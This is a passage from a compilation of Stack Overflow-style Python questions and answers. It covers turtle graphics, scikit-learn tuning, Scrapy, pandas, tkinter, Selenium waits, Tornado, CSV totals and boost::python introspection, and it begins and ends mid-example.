tire3 = polyRectangle(temporary, 110, unVar2, unVar6, 30) # Tire #3
tank.addcomponent(tire3, "gray", "black")
# tire4 = ((10, unVar2), (10, unVar2 - unVar6), (10 + 30, unVar2 - unVar6), (10 + 30, unVar2))
tire4 = polyRectangle(temporary, 10, unVar2, unVar6, 30) # Tire #4
tank.addcomponent(tire4, "gray", "black")
# bodyTank = ((20, unVar3), (20, unVar3 - 130), (20 + 110, unVar3 - 130), (20 + 110, unVar3))
bodyTank = polyRectangle(temporary, 20, unVar3, 130, 110)
tank.addcomponent(bodyTank, "black", "gray")
# gunTank = ((65, unVar4), (65, unVar4 - 100), (65 + 20, unVar4 - 100), (65 + 20, unVar4))
gunTank = polyRectangle(temporary, 65, unVar4, 100, 20) # Gun
tank.addcomponent(gunTank, "black", "gray")
# exhaustTank = ((50, unVar5), (50, unVar5 - 20), (50 + 10, unVar5 - 20), (50 + 10, unVar5))
exhaustTank = polyRectangle(temporary, 50, unVar5, 20, 10)
tank.addcomponent(exhaustTank, "black", "gray")
# turretTank = ((50, unVar7), (50, unVar7 - 50), (50 + 50, unVar7 - 50), (50 + 50, unVar7))
turretTank = polySquare(temporary, 50, unVar7, 50) # Turret
tank.addcomponent(turretTank, "red", "gray")
turtle.addshape("tank", shape=tank)
del temporary
screen.delay(delay)
tankCursor() # creates and registers the "tank" cursor shape
tank = turtle
tank.shape("tank")
turtle.up() # get rid of the ink
screen = turtle.Screen()
def moveforward(): #I cannot get this function to work
tank.left(90)
tank.forward(40)
def movebackward(): #I cannot get this function to work
tank.left(90)
tank.backward(40)
def moveright():
tank.forward(40)
def moveleft():
tank.backward(40)
#Background color
t.screen.bgcolor("green")
#Movement of tank
screen.onkeypress(moveright, "Right")
screen.onkeypress(moveleft, "Left")
screen.onkeypress(moveforward, "Up")
screen.onkeypress(movebackward, "Down")
Answer: This is an example of what I think is consistent motion: regardless of tank
orientation, 'up' is forward, 'down' is backward, 'left' is 90 degrees to the
left and 'right' is 90 degrees to the right.
I've redone the tank cursor so its center is the center of the turret and
removed the `setheading()` calls from the drawing routines. I've also stripped
down the example just to demonstrate the motion:
import turtle
# Defining shapes
def polySquare(t, x, y, length):
t.goto(x, y)
t.begin_poly()
for count in range(4):
t.forward(length)
t.left(90)
t.end_poly()
return t.get_poly()
def polyRectangle(t, x, y, length1, length2):
t.goto(x, y)
t.begin_poly()
for count in range(2):
t.forward(length1)
t.left(90)
t.forward(length2)
t.left(90)
t.end_poly()
return t.get_poly()
def tankCursor():
"""
Create the tank cursor.
"""
temporary = turtle.Turtle()
temporary.hideturtle()
temporary.penup()
screen = turtle.getscreen()
delay = screen.delay()
screen.delay(0)
tank = turtle.Shape("compound")
tire1 = polyRectangle(temporary, -65, -75, 30, 75) # Tire #1
tank.addcomponent(tire1, "gray", "black")
tire2 = polyRectangle(temporary, 35, -75, 30, 75) # Tire #2
tank.addcomponent(tire2, "gray", "black")
tire3 = polyRectangle(temporary, 35, 0, 30, 75) # Tire #3
tank.addcomponent(tire3, "gray", "black")
tire4 = polyRectangle(temporary, -65, 0, 30, 75) # Tire #4
tank.addcomponent(tire4, "gray", "black")
bodyTank = polyRectangle(temporary, -55, -65, 110, 130)
tank.addcomponent(bodyTank, "black", "gray")
gunTank = polyRectangle(temporary, -10, 25, 20, 100) # Gun
tank.addcomponent(gunTank, "black", "gray")
exhaustTank = polyRectangle(temporary, -25, -75, 10, 20)
tank.addcomponent(exhaustTank, "black", "gray")
turretTank = polySquare(temporary, -25, -25, 50) # Turret
tank.addcomponent(turretTank, "red", "gray")
turtle.addshape("tank", shape=tank)
del temporary
screen.delay(delay)
tankCursor() # creates and registers the "tank" cursor shape
turtle.shape("tank")
turtle.up() # get rid of the ink
# Movement of tank
screen = turtle.Screen()
screen.onkeypress(lambda : turtle.right(90), "Right")
screen.onkeypress(lambda : turtle.left(90), "Left")
screen.onkeypress(lambda : turtle.forward(40), "Up")
screen.onkeypress(lambda : turtle.backward(40), "Down")
turtle.listen()
turtle.mainloop()
|
How to tune parameters in Random Forest ? (Python Scikit Learn)
Question:
class sklearn.ensemble.RandomForestClassifier(n_estimators=10, criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1, min_weight_fraction_leaf=0.0, max_features='auto', max_leaf_nodes=None, bootstrap=True, oob_score=False, n_jobs=1, random_state=None, verbose=0, warm_start=False, class_weight=None)
I'm using a random forest model w/ 9 samples and about 7000 attributes. Of
these samples, there are 3 categories that my classifier recognizes.
I know this is far from ideal conditions but I'm trying to figure out which
attributes are the most important in feature predictions. **Which parameters
would be the best to tweak for optimizing feature importance?**
I tried different `n_estimators` and noticed that the amount of "significant
features" (i.e. nonzero values in the `feature_importances_` array) increased
dramatically.
I've read through the documentation but if anyone has any experience in this,
**I would like to know which parameters are the best to tune and a brief
explanation why.**
Answer: From my experience, there are three features worth exploring with the sklearn
RandomForestClassifier, in order of importance:
* `n_estimators`
* `max_features`
* `criterion`
`n_estimators` is not really worth optimizing. The more estimators you give
it, the better it will do. 500 or 1000 is usually sufficient.
`max_features` is worth exploring for many different values. It may have a
large impact on the behavior of the RF because it decides how many features
each tree in the RF considers at each split.
`criterion` may have a small impact, but usually the default is fine. If you
have the time, try it out.
Make sure to use sklearn's [GridSearch](http://scikit-
learn.org/stable/modules/grid_search.html) (preferably GridSearchCV, but your
data set size is too small) when trying out these parameters.
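A hedged sketch of such a search (the import path is `sklearn.grid_search` on older scikit-learn releases and `sklearn.model_selection` on newer ones; `X` and `y` stand for your feature matrix and labels):
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV  # sklearn.grid_search on older versions
param_grid = {
    'max_features': ['sqrt', 'log2', 0.1, 0.3],
    'criterion': ['gini', 'entropy'],
}
search = GridSearchCV(RandomForestClassifier(n_estimators=500), param_grid, cv=3)
search.fit(X, y)
print(search.best_params_)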
If I understand your question correctly, though, you only have 9 samples and 3
classes? Presumably 3 samples per class? It's very, very likely that your RF
is going to overfit with that little amount of data, unless they are good,
representative records.
|
How to parse a number as either an int or a float, depending on required precision?
Question: Requirements:
1. Input can be either string or number
2. If input could be treated as an int without loss of precision, cast to int
3. If input could be treated as a float, cast to float
Here is the section of code where I am using this.
def make_operand(symbol, left=None, right=None):
valid_symbols = ['*', '/', '+', '-']
if symbol in valid_symbols:
return Operand(symbol, left, right)
as_int = re.compile("^-?[0-9]+$").match(str(symbol))
as_float = re.compile("^[-+]?[0-9]*\.?[0-9]+$").match(str(symbol))
as_number = int(symbol) if as_int else float(symbol) if as_float else None
if as_number:
return NumericOperand(as_number)
raise ValueError("Invalid symbol or number")
This works but it looks messy and smells wrong.
An implementation using try blocks also works, but seems less simple:
as_number = None
try:
as_float = float(symbol)
except ValueError:
as_float = None
if as_float:
as_int = int(as_float)
as_number = as_int if as_int == as_float else as_float
if as_number:
return NumericOperand(as_number)
raise ValueError("Invalid symbol or number")
Is there a better approach, or is one of these close to the Pythonic method of
doing things?
Answer: If you don't mind third party modules, there is a C-exension module called
[fastnumbers](https://pypi.python.org/pypi/fastnumbers) that was designed
exactly for this purpose. The
[fast_real](http://pythonhosted.org/fastnumbers/fast.html#fast-real) function
does exactly what you are looking for (provided you use `coerce=True`,
available on `fastnumbers>=0.7.4`).
Full disclosure, I am the author.
>>> from fastnumbers import fast_real
>>> fast_real('56')
56
>>> fast_real('56.0')
56
>>> fast_real('56.07')
56.07
>>> fast_real('56.07 lb')
'56.07 lb'
>>> fast_real(56.07)
56.07
>>> fast_real(56.0)
56.0
>>> fast_real(56.0, coerce=True)
56
>>> fast_real(56)
56
>>> fast_real('56.07 lb', raise_on_invalid=True)
Traceback (most recent call last):
...
ValueError: could not convert string to float: '56.07 lb'
|
Run Multiple Spider sequentially
Question:
Class Myspider1
#do something....
Class Myspider2
#do something...
The above is the structure of my spider.py file. I am trying to run
Myspider1 first and then run Myspider2 multiple times, depending on some
conditions. How could I do that? Any tips?
configure_logging()
runner = CrawlerRunner()
def crawl():
yield runner.crawl(Myspider1,arg.....)
yield runner.crawl(Myspider2,arg.....)
crawl()
reactor.run()
I am trying to use this approach but have no idea how to run it. Should I run
a command at the command line (if so, what commands?) or just run the Python file?
Thanks a lot!
Answer: **run the python file**
for example: **test.py**
import scrapy
from twisted.internet import reactor, defer
from scrapy.crawler import CrawlerRunner
from scrapy.utils.log import configure_logging
class MySpider1(scrapy.Spider):
# Your first spider definition
name = "dmoz"
allowed_domains = ["dmoz.org"]
start_urls = [
"http://www.dmoz.org/Computers/Programming/Languages/Python/Books/"
]
def parse(self, response):
print "first spider"
class MySpider2(scrapy.Spider):
# Your second spider definition
name = "dmoz"
allowed_domains = ["dmoz.org"]
start_urls = [
"http://www.dmoz.org/Computers/Programming/Languages/Python/Resources/"
]
def parse(self, response):
print "second spider"
configure_logging()
runner = CrawlerRunner()
@defer.inlineCallbacks
def crawl():
yield runner.crawl(MySpider1)
yield runner.crawl(MySpider2)
reactor.stop()
crawl()
reactor.run() # the script will block here until the last crawl call is finished
Now run **python test.py > output.txt**
You can observe from the output.txt that your spiders run sequentially.
|
How to create a pandas DataFrame from its indexes and a two variable function?
Question: This is a common pattern I've been using:
rows = ['Joe','Amy','Tom']
columns = ['account_no', 'balance']
def f(row, column):
'''Fetches value from database'''
return np.random.random()
pd.DataFrame([[f(row, column) for column in columns] for row in rows], index=rows, columns=columns)
If the rows and columns are numerical, I can also use np.meshgrid:
rows = [1,2,3]
columns = [4,5]
xs, ys = np.meshgrid(rows, columns, indexing='ij')  # xs[i, j] = rows[i], ys[i, j] = columns[j]
pd.DataFrame(np.vectorize(f)(xs, ys), index=rows, columns=columns)
My question is, what is the most elegant/Pythonic/"pandasic"/fastest/most
readable way to doing this in the general case?
Thanks!
Answer: A way of doing this could be to turn your function into a ufunc and then use
[outer](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.ufunc.outer.html)
import numpy as np
uf = np.frompyfunc(f, 2, 1) # f has 2 inputs, 1 outputs
pd.DataFrame(uf.outer(rows, columns), index=rows, columns=columns)
One criterion you have above, though, is 'most readable', for which I'd say your
existing for-loop solution is best.
|
Error when trying to install plotly
Question:
pip install plotly
Gave me a permissions error
sudo pip install plotly
Worked and installed plotly; I then tried 'import plotly' and got ImportError: No module
named 'plotly'.
* * *
Now when I do this again:
pip install plotly
I get "Requirement already satisfied", but it still doesn't import.
sudo pip install plotly --upgrade
OSError: [Errno 1] Operation not permitted: '/tmp/pip-PbshIM-
uninstall/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/six-1.4.1-py2.7.egg-
info'
Answer: Since you're on a Mac, running `pip` will install a package into the Mac's own
copy of Python 2.7. You're then running Python, which is likely Python 3 and
hence _not_ the Mac's own copy.
To `pip install` something into your installation of Python 3, use `pip3`
instead:
sudo pip3 install plotly
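If you are ever unsure which interpreter a given `pip` belongs to, invoking pip through the interpreter itself avoids the mismatch:
python3 -m pip install plotly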
|
Converting Python 3 libraries to be used in 2.7
Question: I'm following a tutorial which is coded in Python 3 and the author uses
from urllib import parse
which gives me an error.
I've tried using Google and reading up about the library but can't seem to
find an equivalent. All my code for the project is in 2.7, so I would prefer not to
have to move over to 3 just for this little bit.
Thanks for any help in advance.
Answer: Urllib has been restructured in Python 3. What was
[urlparse](https://docs.python.org/2/library/urlparse.html#module-urlparse) in
Python 2 is now urllib.parse in Python 3. So just use urlparse. You can
even do this: `import urlparse as parse` and the rest of the code should be
the same.
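If you ever need the same file to run under both versions, a small sketch of the usual compatibility pattern:
try:
    from urllib import parse  # Python 3
except ImportError:
    import urlparse as parse  # Python 2
print(parse.urlparse('http://example.com/path?q=1').netloc)  # 'example.com'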
|
unable to run more than one tornado process
Question: I've developed a tornado app but when more than one user logs in it seems to
log the previous user out. I come from an Apache background so I thought
tornado would either spawn a thread or fork a process but seems like that is
not what is happening.
To mitigate this I've installed nginx and configured it as a reverse proxy to
forward incoming requests to an available tornado process. Nginx seems to work
fine however when I try to start more than one tornado process using a
different port I get the following error:
http_server.listen(options.port)
File "/usr/local/lib/python2.7/dist-packages/tornado/tcpserver.py", line 125, in listen
sockets = bind_sockets(port, address=address)
File "/usr/local/lib/python2.7/dist-packages/tornado/netutil.py", line 145, in bind_sockets
sock.bind(sockaddr)
File "/usr/lib/python2.7/socket.py", line 224, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 98] Address already in use
Basically I get this for each process I try to start on a different port.
I've read that I should use supervisor to manage my tornado processes but I'm
thinking that is more of a convenience. At the moment I'm wondering if the
problem has to do with my actual tornado code or my setup somewhere? My python
code looks like this:
from tornado.options import define, options
define("port", default=8000, help="run on given port", type=int)
....
http_server = tornado.httpserver.HTTPServer(app)
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
My handlers all work fine and I can access the site when I go to
localhost:8000. I just need a pair of fresh eyes, please. ;)
Answer: Well, I solved the problem. I had a .sh file that tried to start multiple
processes with:
python initpumpkin.py --port=8000&
python initpumpkin.py --port=8001&
python initpumpkin.py --port=8002&
python initpumpkin.py --port=8003&
Unfortunately, I didn't tell tornado to parse the command line options, so I
would always get that "address already in use" error: port 8000 was
defined as my default port, so every process attempted to listen on that port each
time. To mitigate this, make sure to call
tornado.options.parse_command_line() inside the main block:
if __name__ == "__main__":
tornado.options.parse_command_line()
then run from the CLI with whatever arguments.
|
python 3.5 pass object from one class to another
Question: I am trying to figure out how to pass data from one class into another. My
knowledge of python is very limited and the code I am using has been taken
from examples on this site.
I am trying to pass the user name from the "UserNamePage" class into the "WelcomePage"
class. Can someone please show me how to achieve this? I will be adding more
pages and I will need to pass data between the different pages.
Below is the full code - as mentioned above most of this code has come from
other examples and I am using these examples to learn from.
import tkinter as tk
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
import datetime
import re
def Chk_String(mystring):
Allowed_Chars = re.compile('[a-zA-Z_-]+$')
return Allowed_Chars.match(mystring)
def FnChkLogin(Page):
booAllFieldsCorrect = False;
myFName = Page.FName.get()
myFName = myFName.replace(" ", "")
myLName = Page.LName.get()
myLName = myLName.replace(" ", "")
if myFName == "":
messagebox.showinfo('Login Ifo is Missing', "Please type in your First Name")
elif not Chk_String(myFName):
messagebox.showinfo('First Name Error:', "Please only use Leter or - or _")
elif myLName == "":
messagebox.showinfo('Login Info is Missing', "Please type in your Last Name")
elif not Chk_String(myLName):
messagebox.showinfo('Last Name Error:', "Please only use Leter or - or _")
else:
booAllFieldsCorrect = True;
if booAllFieldsCorrect == True:
app.geometry("400x200")
app.title("Welcome Screen")
PageController.show_frame(app,"WelcomePage")
def FnAddButton(Page,Name,Label,Width,X,Y,FnAction):
Name = ttk.Button (Page, text=Label,width=int(Width),command=FnAction)
Name.place(x=int(X),y=int(Y))
class PageController(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
container = tk.Frame(self)
container.pack(side="top",fill="both",expand="True")
container.grid_rowconfigure(0,weight=1)
container.grid_columnconfigure(0,weight=1)
self.frames={}
for F in (UserNamePage,WelcomePage):
page_name = F.__name__
frame = F(container,self)
self.frames[page_name] = frame
frame.grid(row=0,column=0,sticky="nsew")
self.show_frame("UserNamePage")
def show_frame(self,page_name):
frame= self.frames[page_name]
frame.tkraise()
class UserNamePage(tk.Frame):
def __init__(self,parent,controller):
tk.Frame.__init__(self,parent)
self.controller = controller
lblFName = Label(self,text="First Name ",relief=GROOVE,width=12,anchor=E).place(x=50,y=50)
lblLName = Label(self,text="Last Name ",relief=GROOVE,width=12,anchor=E).place(x=50,y=75)
self.FName = StringVar()
inputFName = Entry(self,textvariable=self.FName,width=25).place(x=142,y=50)
self.LName = StringVar()
inputLName = Entry(self,textvariable=self.LName,width=25).place(x=142,y=75)
cmdContinue = ttk.Button (self, text='Continue',width=9,command=lambda:FnChkLogin(self)).place(x=320,y=70)
class WelcomePage(tk.Frame):
def __init__(self,parent,controller):
tk.Frame.__init__(self,parent)
self.controller = controller
UserNamePageData = UserNamePage(parent,controller)
UserFName = str(UserNamePageData.FName)
UserLName = str(UserNamePageData.LName)
strWelcome = "Welcome " + UserFName + " " + UserLName
lblWelcome = Label(self,text=strWelcome,relief=FLAT,width=50,anchor=W).place(x=25,y=25)
if __name__ == "__main__":
app = PageController()
app.geometry("400x200")
app.title("User Page")
app.eval('tk::PlaceWindow %s center' % app.winfo_pathname(app.winfo_id()))
app.mainloop()
Answer: In the method `show_frame(self,page_name)` in class `PageController`, add the
following lines
if page_name == 'WelcomePage':
self.frames['WelcomePage'].UserFName = self.frames['UserNamePage'].FName.get()
self.frames['WelcomePage'].UserLName = self.frames['UserNamePage'].LName.get()
and remove the two lines `UserFName = str(UserNamePageData.FName)`and
`UserLName = str(UserNamePageData.LName)`.
Explanation: it must be done in a place that has references to both frames
(i.e. class `PageController`).
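For clarity, a minimal sketch of the modified method (names taken from the code above):
def show_frame(self, page_name):
    if page_name == 'WelcomePage':
        user_page = self.frames['UserNamePage']
        welcome_page = self.frames['WelcomePage']
        welcome_page.UserFName = user_page.FName.get()
        welcome_page.UserLName = user_page.LName.get()
    frame = self.frames[page_name]
    frame.tkraise()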
|
How to wait until a page is loaded in Python Selenium
Question:
try:
next_page_elem = self.browser.find_element_by_xpath("//a[text()='%d']" % pageno)
except noSuchElementException:
break
print('page ', pageno)
next_page_elem.click()
sleep(10)
I have a page that contains information about reports inside a frame. When I use
the sleep method to wait for the next page to load it works, but without it I kept
getting the information on page 1. Besides sleep, is there a better way to do
this in Selenium? I have tried some previous posts that are similar, but I
think the HTML I have is quite unique; please see the example below. [Selenium
Python: how to wait until the page is
loaded?](http://stackoverflow.com/questions/26566799/selenium-python-how-to-
wait-until-the-page-is-loaded) Any help would be much appreciated. Thanks.
<html>
<div class="z-page-block-right" style="width:60%;">
<ul class="pageingclass">
<li/>
<li>
<a class="on" href="javascript:void(0)">1</a>
</li>
<li>
<a onclick=" gotoPage('2','2')" href="javascript:void(0)">2</a>
</li>
<li>
<a class=" next " onclick=" gotoPage('2','2')" href="javascript:void(0)"/>
</li>
</ul>
</div>
</html>
Answer: See this element:
<a class="on" href="javascript:void(0)">1</a>
From what I understand this basically means what page are we currently at.
Since we know the page number beforehand, the idea would be to
[wait](http://selenium-python.readthedocs.org/waits.html#explicit-waits) until
the element with the current page number becomes present:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
wait = WebDriverWait(driver, 10)
try:
next_page_elem = self.browser.find_element_by_xpath("//a[text()='%d']" % pageno)
except noSuchElementException:
break
print('page ', pageno)
next_page_elem.click()
# wait for the page to load
wait.until(
EC.presence_of_element_located((By.XPATH, "//a[@class = 'on' and . = '%d']" % pageno))
)
Where `//a[@class = 'on' and . = '%d']` is an XPath expression that would
match `a` element(s) with `class="on"` and the text equal to the page number
that we paste into the expression via string formatting.
|
Implementing Regular expressions in Python
Question: I have code like this.
<td class="check ABCD" rowspan="2"><center><div class="checkbox {{#if checked}}select{{else}}deselect{{/if}}" id="{{id}}" {{data "tool"}
<td class="check" rowspan="2"><center><div class="checkbox {{#if checked}}select{{else}}deselect{{/if}}" id="{{id}}" {{data "tool"}}>
And I want to extract only the class and ID names from the above code. I have
very little knowledge about using regular expressions in Python.
How can I extract only the class name and id name (the ones between the quotes) using a
regular expression? Or is there a better way to do this? If yes, please
help me find it :)
Thanks in advance.
Answer: Since you asked for a Regex solution in Python, you'll get one:
import re
p = re.compile(ur'^.+?class="([^"]+)".+id="([^"]+)".+?$', re.MULTILINE)
test_str = u"<td class=\"check ABCD\" rowspan=\"2\"><center><div class=\"checkbox {{#if checked}}select{{else}}deselect{{/if}}\" id=\"{{id}}\" {{data \"tool\"}\n<td class=\"check\" rowspan=\"2\"><center><div class=\"checkbox {{#if checked}}select{{else}}deselect{{/if}}\" id=\"{{id}}\" {{data \"tool\"}}>"
re.findall(p, test_str)
See live example over here: <https://regex101.com/r/cG8dC5/1>
Nevertheless, as some other users already noted, regex [isn't ideal for
parsing](http://stackoverflow.com/questions/1732348/regex-match-open-tags-
except-xhtml-self-contained-tags/1732454#1732454)
(x)HTML. Better have a look at: <https://pypi.python.org/pypi/beautifulsoup4>
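A minimal BeautifulSoup sketch of the same kind of extraction (the handlebars expressions from the question are simplified here so the snippet is self-contained):
from bs4 import BeautifulSoup
html = '<td class="check ABCD" rowspan="2"><center><div class="checkbox select" id="myid"></div></center></td>'
soup = BeautifulSoup(html, 'html.parser')
for tag in soup.find_all(True):
    if tag.get('class') or tag.get('id'):
        print(tag.name, tag.get('class'), tag.get('id'))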
|
calculating the total of row 4 in excel csv file python
Question: I can't work out the total of column 4 in a csv file. My code asks the user to enter a code, which
is searched for in a csv file; the matching row is then written to a new csv file so
it can be printed as a receipt. My problem is in the last few lines. This is my
code so far:
import csv
try_again= "Yes"
myfile2=open("reciept.csv","a+")
while try_again =="Yes":
found= "no"
myfile=open("stock_file.csv","r+")
gtin_8= input("enter the gtin-8")
quantity= input("enter quantity wanted")
reader=csv.reader(myfile)
for row in reader:
if gtin_8 == row[0]:
description= row[1]
unit_price= row[2]
product_price=((float(unit_price)*(float(quantity))))
product_price1= str(product_price)
new_record=(gtin_8+","+description+","+quantity+","+unit_price+","+product_price1)
myfile2.write(str(new_record))
myfile2.write("\n")
found="yes"
if found=="no":
nf="not found"
new_record1=(gtin_8+","+nf)
myfile2.write(new_record1)
myfile2.write("\n")
try_again=input("do you want to try again")
try_again=try_again.title()
myfile2.close()
myfile3=open("reciept.csv","r+")
reader1=csv.reader(myfile3)
total_cost=0
for row in reader1:
print (row)
total = sum(float(r[4]) for r in csv.reader(myfile3))
print (total_cost)
Answer: You have a nested loop at the end (a for loop with a generator expression inside
it that re-reads the file), which is why it isn't working like you want it to.
You also define a variable named `total_cost` as `0`, never add anything to
it, and then just print it.
No nested loop is needed so this should work:
total_cost = 0.0
for row in reader1:
    if row[1] != "not found":  # skip the 'not found' rows, which have no price field
        total_cost += float(row[4])
Other pointers:
There is a
[`csv.writer`](https://docs.python.org/3/library/csv.html#csv.writer) too
which is safer to use than just string concatenation and writing to a file.
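A small sketch of what that would look like for the receipt rows (variable names taken from the question's code):
import csv
with open("reciept.csv", "a") as f:
    writer = csv.writer(f)
    writer.writerow([gtin_8, description, quantity, unit_price, product_price])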
|
Python: how to remove the name of the parent object from function names
Question: I have a .py file with my own functions, which I run in IPython on several
machines. The problem is that on some platforms I can call functions like
sin(), size(), plot() without the prefix of the parent module name, and on other
platforms I need to write the full path: numpy.sin(), ndarray.size(),
pyplot.plot(). 1) What are the rules that determine when the full path is needed
and when I can use the short form? 2) Can I manually set a function to its
short form?
Answer: Take a look at the definition of the `import` statement. There are two forms:
import math
math.sin(1)
Second form is:
from math import sin
sin(1)
Note that since modules are also objects, you can also store `math.sin` in the
first case in a local variable:
import math
sin = math.sin
sin(1)
|
selenium TimeoutException: Message: python
Question: I have the following code, and I am trying to connect to iTunes Connect using
Selenium:
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
driver = webdriver.Firefox()
driver.get("https://itunesconnect.apple.com/WebObjects/iTunesConnect.woa")
element = WebDriverWait(driver, 20).until(lambda driver : driver.find_element_by_id('appleId'))
But i was getting `*** TimeoutException: Message:` as below
*** TimeoutException: Message:
Stacktrace:
at FirefoxDriver.prototype.findElementInternal_ (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/driver-component.js:10770)
at FirefoxDriver.prototype.findElement (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/driver-component.js:10779)
at DelayedCommand.prototype.executeInternal_/h (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/command-processor.js:12661)
at DelayedCommand.prototype.executeInternal_ (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/command-processor.js:12666)
at DelayedCommand.prototype.execute/< (file:///var/folders/x1/1bwt313j0qvgdh5pfzpbpvcw0000gn/T/tmp27vpUf/extensions/[email protected]/components/command-processor.js:12608)
Any idea of what's going wrong ?
Answer: The element is inside `iframe`, you need to switch to it first
driver.switch_to_frame('authFrame') # by frame id, can also be name or WebElement
element = WebDriverWait(driver, 20).until(lambda driver : driver.find_element_by_id('appleId'))
And to switch back
driver.switch_to_default_content()
|
String alignment in Tkinter
Question: I want a message box in Python which shows the concatenated string text. I
want the text to be left-aligned, but it isn't. I tried `ljust()` and `{:<14}`
etc., but it is still not aligned.
It looks like this:
[](http://i.stack.imgur.com/hqBRg.png)
The code piece is below,
for todo_item in resp.json()['SectorList']:
sector_id +='Sector Id: {:<14}'.format(todo_item['SectorId']) + '\n'
sector_name += 'Sector Name: {:<40}'.format(todo_item['SectorName']) + '\n'
After the loop I add those texts into my message box.
label_id = tkinter.Label(f, anchor = tkinter.W, text = sector_id)
label_name= tkinter.Label(f,anchor = tkinter.W, text = sector_name)
label_id.grid(row= 2, column = 1, sticky = tkinter.W)
label_name.grid(row= 2, column = 2, sticky = tkinter.W)
The sector id part is fine but the sector name is not left-aligned. Any idea?
Answer: Relying on fonts for alignment is bad practice; as mentioned it only works
with monospaced fonts, but do you _really_ want to use monospaced fonts in
your entire application _only_ for alignment? I sure don't. And what if you
want to change a `Label` to a `Input` or something else later on? Do we now
have to add new `Label`s just for alignment?
So while changing to a monospaced font "works", a (much) better way would be
to use the tools Tk provides us.
For example, you can set the `Label()` in the first column to a fixed width:
import tkinter
# Just some random strings of different sizes from my dictionary
names = ['Algol', 'American', 'Americanises', 'Americanising', 'Americanism',
'Argentine', 'Argentinian', 'Ariz', 'Arizona', 'Armstrong']
root = tkinter.Tk()
tkinter.Label(root, text='Lists:', anchor=tkinter.W).grid(row=0, column=0, sticky=tkinter.W)
for i in range(0, 10):
label_id = tkinter.Label(root, width=30, anchor=tkinter.W, text='Sector %s' % i)
label_name = tkinter.Label(root, anchor=tkinter.W, text=names[i])
label_id.grid(row=i+1, column=0, sticky=tkinter.W)
label_name.grid(row=i+1, column=1, sticky=tkinter.W)
root.mainloop()
There are more ways to do this, though. For example by setting a width using
`columnconfigure`:
import tkinter
# Just some random strings of different sizes from my dictionary
names = ['Algol', 'American', 'Americanises', 'Americanising', 'Americanism',
'Argentine', 'Argentinian', 'Ariz', 'Arizona', 'Armstrong']
root = tkinter.Tk()
root.columnconfigure(0, minsize=150)
tkinter.Label(root, text='Lists:', anchor=tkinter.W).grid(row=0, column=0, sticky=tkinter.W)
for i in range(0, 10):
label_id = tkinter.Label(root, anchor=tkinter.W, text='Sector %s' % i)
label_name = tkinter.Label(root, anchor=tkinter.W, text=names[i])
label_id.grid(row=i+1, column=0, sticky=tkinter.W)
label_name.grid(row=i+1, column=1, sticky=tkinter.W)
root.mainloop()
The advantage of using `columnconfigure()` is that the minimum width is
independent of the column's contents. So if you change the `Label()` to
something else later, the layout should still work, and it's probably a bit
more obvious that you explicitly want to set a width for this column.
|
How to validate that a boost::python::object is a function that takes one argument
Question: How can I validate that a boost::python::object argument is a Python function
that takes one argument?
void subscribe_py(boost::python::object callback){
//check callback is a function signature
}
Answer: Boost.Python does not provide a higher-level type to help perform
introspection. However, one can use the Python C-API's
[`PyCallable_Check()`](https://docs.python.org/2/c-api/object.html#c.PyCallable_Check)
to check if a Python object is callable, and then use a Python introspection
module, such as [`inspect`](https://docs.python.org/2/library/inspect.html),
to determine the callable object's signature. Boost.Python's interoperability
between C++ and the Python makes this fairly seamless to use Python modules.
Here is an auxiliary function, `require_arity(fn, n)` that requires the
expression `fn(a_1, a_2, ..., a_n)` to be valid:
/// @brief Given a Python object `fn` and an arity of `n`, requires
/// that the expression `fn(a_1, a_2, ..., a_n)` be valid.
/// Raise TypeError if `fn` is not callable and `ValueError`
/// if `fn` is callable, but has the wrong arity.
void require_arity(
std::string name,
boost::python::object fn,
std::size_t arity)
{
namespace python = boost::python;
std::stringstream error_msg;
error_msg << name << "() must take exactly " << arity << " arguments";
// Throw if the callback is not callable.
if (!PyCallable_Check(fn.ptr()))
{
PyErr_SetString(PyExc_TypeError, error_msg.str().c_str());
python::throw_error_already_set();
}
// Use the inspect module to extract the arg spec.
// >>> import inspect
auto inspect = python::import("inspect");
// >>> args, varargs, keywords, defaults = inspect.getargspec(fn)
auto arg_spec = inspect.attr("getargspec")(fn);
python::object args = arg_spec[0];
python::object varargs = arg_spec[1];
python::object defaults = arg_spec[3];
// Calculate the number of required arguments.
auto args_count = args ? python::len(args) : 0;
auto defaults_count = defaults ? python::len(defaults) : 0;
// If the function is a bound method or a class method, then the
// first argument (`self` or `cls`) will be implicitly provided.
// >>> has_self = inspect.ismethod(fn) and fn.__self__ is not None
if (static_cast<bool>(inspect.attr("ismethod")(fn))
&& fn.attr("__self__"))
{
--args_count;
}
// Require at least one argument. The function should support
// any of the following specs:
// >>> fn(a1)
// >>> fn(a1, a2=42)
// >>> fn(a1=42)
// >>> fn(*args)
auto required_count = args_count - defaults_count;
if (!( (required_count == 1) // fn(a1), fn(a1, a2=42)
|| (args_count > 0 && required_count == 0) // fn(a1=42)
|| (varargs) // fn(*args)
))
{
PyErr_SetString(PyExc_ValueError, error_msg.str().c_str());
python::throw_error_already_set();
}
}
And its usage would be:
void subscribe_py(boost::python::object callback)
{
require_arity("callback", callback, 1); // callback(a1) is valid
...
}
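For reference, the Python-side calls that the C++ code drives look like this
(the `demo` helper below is purely illustrative; the output shown is from
Python 2, where `getargspec()` is still current):
    import inspect
    def demo(fn):
        # PyCallable_Check() on the C++ side corresponds to callable() here.
        print(callable(fn))
        # getargspec() returns (args, varargs, keywords, defaults); the C++
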